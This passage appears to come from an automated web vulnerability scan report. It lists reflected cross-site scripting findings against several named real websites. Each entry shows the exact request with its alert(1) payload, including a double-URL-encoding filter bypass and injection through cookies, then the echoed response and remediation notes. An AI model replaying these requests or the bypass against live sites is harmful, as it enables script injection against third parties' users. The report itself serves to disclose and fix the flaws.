Host: www.nutter.com
Proxy-Connection: keep-alive
Referer: http://www.nutter.com/careers.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 19:17:54 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) PHP/4.4.9 with Suhosin-Patch
X-Powered-By: PHP/4.4.9
Content-Type: text/html
Content-Length: 17264

<!-- careers start -->

error: Unknown column '224c89d' in 'where clause' | 1054<BR>sql: SELECT CategoryName FROM _categories WHERE CategoryID=224c89d<a>50084c84a3a
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/2000/REC-xhtml1-20000126/DTD/xhtml1-transitional.dtd">
...[SNIP]...
5.97. http://www.socialfollow.com/button/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/

Issue detail

The value of the b request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7de21%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f18bd7fce was submitted in the b parameter. This input was echoed as 7de21><script>alert(1)</script>f9f18bd7fce in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the b request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/?b=17de21%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef9f18bd7fce HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:38:00 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/javascript
Content-Length: 11681

<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warni
...[SNIP]...
uranimatedegree=(1-Math.cos((elapsed/this.effects.fade.duration)*Math.PI))/2;},setcss:function(param){for(prop in param){this.style[prop]=param[prop];}},hidemenu:function(menuid){var menu=socialfollow17de21><script>alert(1)</script>f9f18bd7fce.menusmap[menuid];clearInterval(menu.animatetimer);menu.dropmenu.setcss({visibility:'hidden',left:0,top:0});menu.shadow.setcss({visibility:'hidden',left:0,top:0});},getElementsByClass:function(targetcl
...[SNIP]...
5.98. http://www.socialfollow.com/button/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/

Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload ae7c0%253cscript%253ealert%25281%2529%253c%252fscript%253e2621f89c37 was submitted in the b parameter. This input was echoed as ae7c0<script>alert(1)</script>2621f89c37 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the b request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/?b=1ae7c0%253cscript%253ealert%25281%2529%253c%252fscript%253e2621f89c37 HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:38:01 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Type: text/javascript
Content-Length: 11623

<br/><b>Warning</b>:mysql_num_rows():supplied argument is not a valid MySQL result resource in<b>/var/www/vhosts/socialfollow.com/httpdocs/button/social-follow.php</b>on line<b>6</b><br/><br/><b>Warni
...[SNIP]...
<br/>var menu1ae7c0<script>alert(1)</script>2621f89c37={divclass:'sociallinks1ae7c0<script>
...[SNIP]...
5.99. http://www.socialfollow.com/button/css/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/css/

Issue detail

The value of the b request parameter is copied into the HTML document as plain text between tags. The payload e023e<a%20b%3dc>467568c8c1 was submitted in the b parameter. This input was echoed as e023e<a b=c>467568c8c1 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /button/css/?b=1e023e<a%20b%3dc>467568c8c1&n=6&socialSites=106%3Atwitter.png%7C75%3Afacebook.gif%7C169%3Asocial-follow.png%7C168%3Ablog.png%7C120%3Alinkedin.gif%7C93%3Anaymz.gif HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:38:07 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 4506
Content-Type: text/css

div.sociallinks1e023e<a b=c>467568c8c1{position:absolute;left:0;top:0;visibility:hidden;display:block;padding:10px 1px 1px 1px;font:normal 12px Arial, Helvetica, sans-serif;z-index:10000;border:1px solid #cfcfd0;background:#FFFFFF;width:17
...[SNIP]...
5.100. http://www.socialfollow.com/button/css/ [socialSites parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.socialfollow.com
Path:   /button/css/

Issue detail

The value of the socialSites request parameter is copied into the HTML document as plain text between tags. The payload 4946b%253cscript%253ealert%25281%2529%253c%252fscript%253e665c20ebbcd was submitted in the socialSites parameter. This input was echoed as 4946b<script>alert(1)</script>665c20ebbcd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the socialSites request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /button/css/?b=1&n=6&socialSites=106%3Atwitter.png%7C75%3Afacebook.gif%7C169%3Asocial-follow.png%7C168%3Ablog.png%7C120%3Alinkedin.gif%7C93%3Anaymz.gif4946b%253cscript%253ealert%25281%2529%253c%252fscript%253e665c20ebbcd HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1303137471.1

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:38:38 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 3887
Content-Type: text/css

div.sociallinks1{position:absolute;left:0;top:0;visibility:hidden;display:block;padding:10px 1px 1px 1px;font:normal 12px Arial, Helvetica, sans-serif;z-index:10000;border:1px solid #cfcfd0;background
...[SNIP]...
g) no-repeat top left;}
li a.c120{background:url(http://www.socialfollow.com/button/images/linkedin.gif) no-repeat top left;}
li a.c93{background:url(http://www.socialfollow.com/button/images/naymz.gif4946b<script>alert(1)</script>665c20ebbcd) no-repeat top left;}
#sfWrapper1 .paddingSmall, div.sociallinks1 .paddingSmall{padding-right:2px;#padding-right:0;clear: all;}
.socialFollowLink{width:100%;display:block;border:1px solid #D6D6D6;bord
...[SNIP]...
5.101. http://www.socialfollow.com/login.php [tEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /login.php

Issue detail

The value of the tEmail request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b249"><a%20b%3dc>c89c9c10125 was submitted in the tEmail parameter. This input was echoed as 7b249\"><a b=c>c89c9c10125 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /login.php HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www.socialfollow.com/
Cache-Control: max-age=0
Origin: http://www.socialfollow.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=131048717.1303137471.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=131048717.787483735.1303137471.1303137471.1304721456.2; __utmc=131048717; __utmb=131048717.1.10.1304721456
Content-Length: 31

tEmail=Email7b249"><a%20b%3dc>c89c9c10125&pPassword=Password

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:37:57 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Set-Cookie: PHPSESSID=6ccca51566867a3f7d6e3d9b29fb826a; expires=Fri, 06 May 2011 19:37:57 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 4520
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<input name="tEmail" id="tEmail" type="text" value="Email7b249\"><a b=c>c89c9c10125" class="textBoxSize" />
...[SNIP]...
5.102. https://www.taxnotebook.com/Login/PopupMessage.aspx [usr parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.taxnotebook.com
Path:   /Login/PopupMessage.aspx

Issue detail

The value of the usr request parameter is copied into the HTML document as plain text between tags. The payload 7606e<script>alert(1)</script>39ed24a8beb was submitted in the usr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Login/PopupMessage.aspx?usr=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000341)%3C/script%3E7606e<script>alert(1)</script>39ed24a8beb HTTP/1.1
Host: www.taxnotebook.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 01:50:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: SessionStateGUID=bcc55779-a955-7ea4-1e04-a89874af0406; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 6745

<img src='../images/tnlogo.gif' width='96' height='23'>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>Tax Notebook</title>
       <LINK href="../Main.css" typ
...[SNIP]...
</SCRIPT>7606E<SCRIPT>ALERT(1)</SCRIPT>39ED24A8BEB&nbsp;was successfully
                                   created. Log in with this user ID after you have disabled your pop-up blocker
                                   for Tax Notebook.</B>
...[SNIP]...
5.103. http://apps.sapha.com/appshandler.php [sapha_1_19 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the sapha_1_19 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 15ddd'%3balert(1)//7d0c369cb36 was submitted in the sapha_1_19 cookie. This input was echoed as 15ddd';alert(1)//7d0c369cb36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appshandler.php?ac=1&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://www.sapha.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A3315ddd'%3balert(1)//7d0c369cb36

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/x-javascript
Content-Length: 26970

var lastpageview_ID='110075';var lastvisit_ID='2676569';var lastvisitor_ID='2668748';var lastvisit_datetime='2011-05-06 16:05:3315ddd';alert(1)//7d0c369cb36';if(typeof(SCS)=="undefined"){SCS={}}SCS.DOMUtilities=function(){this.addEvent=function(element,event,handler){try{if(element.attachEvent){element.attachEvent("on"+event,handler)}else{if(element.addEv
...[SNIP]...
5.104. http://apps.sapha.com/appshandler.php [sapha_2546_1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://apps.sapha.com
Path:   /appshandler.php

Issue detail

The value of the sapha_2546_1 cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a33f9'%3balert(1)//1878ce9c764 was submitted in the sapha_2546_1 cookie. This input was echoed as a33f9';alert(1)//1878ce9c764 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /appshandler.php?ac=2546&pid=0&NS_sw=1920&NS_sh=1200&NS_sc=16 HTTP/1.1
Host: apps.sapha.com
Proxy-Connection: keep-alive
Referer: http://tours.sapha.com/?scs_sid=2546&scs_tid=25&scscs=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_1=TRUE; sapha_1_19=110075%7C2676569%7C2668748%7C2011-05-06+16%3A05%3A33; sapha_2546_1=68004%7C40411%7C31540%7C2011-05-06+16%3A06%3A08a33f9'%3balert(1)//1878ce9c764

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:06:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: application/x-javascript
Content-Length: 20423

var lastpageview_ID='68004';var lastvisit_ID='40411';var lastvisitor_ID='31540';var lastvisit_datetime='2011-05-06 16:06:08a33f9';alert(1)//1878ce9c764';function loadDomUtils(){if(document.getElementsByClassName==undefined){document.getElementsByClassName=function(B,A){if(A==null){A="*"}var F=new RegExp("(?:^|\\s)"+B+"(?:$|\\s)");var G=document.getEl
...[SNIP]...
5.105. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/billingview.asp

Issue detail

The value of the HinghamLoginError cookie is copied into the HTML document as plain text between tags. The payload bfa5c<script>alert(1)</script>ed54c81a19634ed6d was submitted in the HinghamLoginError cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /billing_view/billingview.asp?policynumber=&Submit=Submit&zipcode= HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/billing_view/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: HinghamLoginError=Please+fill+in+all+valuesbfa5c<script>alert(1)</script>ed54c81a19634ed6d; ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3987
Content-Type: text/html
Set-Cookie: HinghamLoginError=; path=/billing_view
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - Billing Details Access</TITLE>

...[SNIP]...
<span class="errormsg">Please fill in all valuesbfa5c<script>alert(1)</script>ed54c81a19634ed6d</span>
...[SNIP]...
5.106. http://hmficweb.hinghammutual.com/billing_view/billingview.asp [HinghamLoginError cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/billingview.asp

Issue detail

The value of the HinghamLoginError cookie is copied into the HTML document as plain text between tags. The payload 8da1d<script>alert(1)</script>920fa6b6144 was submitted in the HinghamLoginError cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /billing_view/billingview.asp HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: HinghamLoginError=Please+fill+in+all+values8da1d<script>alert(1)</script>920fa6b6144; ASPSESSIONIDSQCDDDAA=HOHJKIBCIBNGKPBKEMJGNONB
Accept-Encoding: gzip, deflate

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:35:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3981
Content-Type: text/html
Set-Cookie: HinghamLoginError=; path=/billing_view
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - Billing Details Access</TITLE>

...[SNIP]...
<span class="errormsg">Please fill in all values8da1d<script>alert(1)</script>920fa6b6144</span>
...[SNIP]...
5.107. http://hmficweb.hinghammutual.com/billing_view/login.asp [HinghamLoginError cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hmficweb.hinghammutual.com
Path:   /billing_view/login.asp

Issue detail

The value of the HinghamLoginError cookie is copied into the HTML document as plain text between tags. The payload add2b<script>alert(1)</script>2a9b96c27c1 was submitted in the HinghamLoginError cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /billing_view/login.asp HTTP/1.1
Referer: http://hmficweb.hinghammutual.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hmficweb.hinghammutual.com
Cookie: HinghamLoginError=Please+fill+in+all+valuesadd2b<script>alert(1)</script>2a9b96c27c1; ASPSESSIONIDSQCDDDAA=HPHJKIBCNPBPFKFPCLEPAMCN; ASP.NET_SessionId=kvicvmmhrzmxk4i3unxfj445
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 17:36:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 3981
Content-Type: text/html
Set-Cookie: HinghamLoginError=; path=/billing_view
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML>
<HEAD>
<TITLE>The Hingham Group - Billing Details Access</TITLE>

...[SNIP]...
<span class="errormsg">Please fill in all valuesadd2b<script>alert(1)</script>2a9b96c27c1</span>
...[SNIP]...
5.108. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload 76c83<script>alert(1)</script>87b9dc254bf was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.compliancepoint.com%2Fsub_serv_isc_pci.asp%3Fgclid%3DCJu4wszV1KgCFQ075QodRCyFgQ&jsref=&rnd=1304748975273 HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.compliancepoint.com/sub_serv_isc_pci.asp?gclid=CJu4wszV1KgCFQ075QodRCyFgQ
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==76c83<script>alert(1)</script>87b9dc254bf; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sat, 07 May 2011 01:21:38 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1368


           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">
           
...[SNIP]...
<div style='display:none'>clicookie:CspT702sdV9LL0aNgCmJAg==76c83<script>alert(1)</script>87b9dc254bf
userid:
</div>
...[SNIP]...
5.109. http://support.expedia.com/app/answers/list/ [MC1 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.expedia.com
Path:   /app/answers/list/

Issue detail

The value of the MC1 cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e0a7"%3balert(1)//dcdeca00260 was submitted in the MC1 cookie. This input was echoed as 3e0a7";alert(1)//dcdeca00260 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /app/answers/list/ HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F
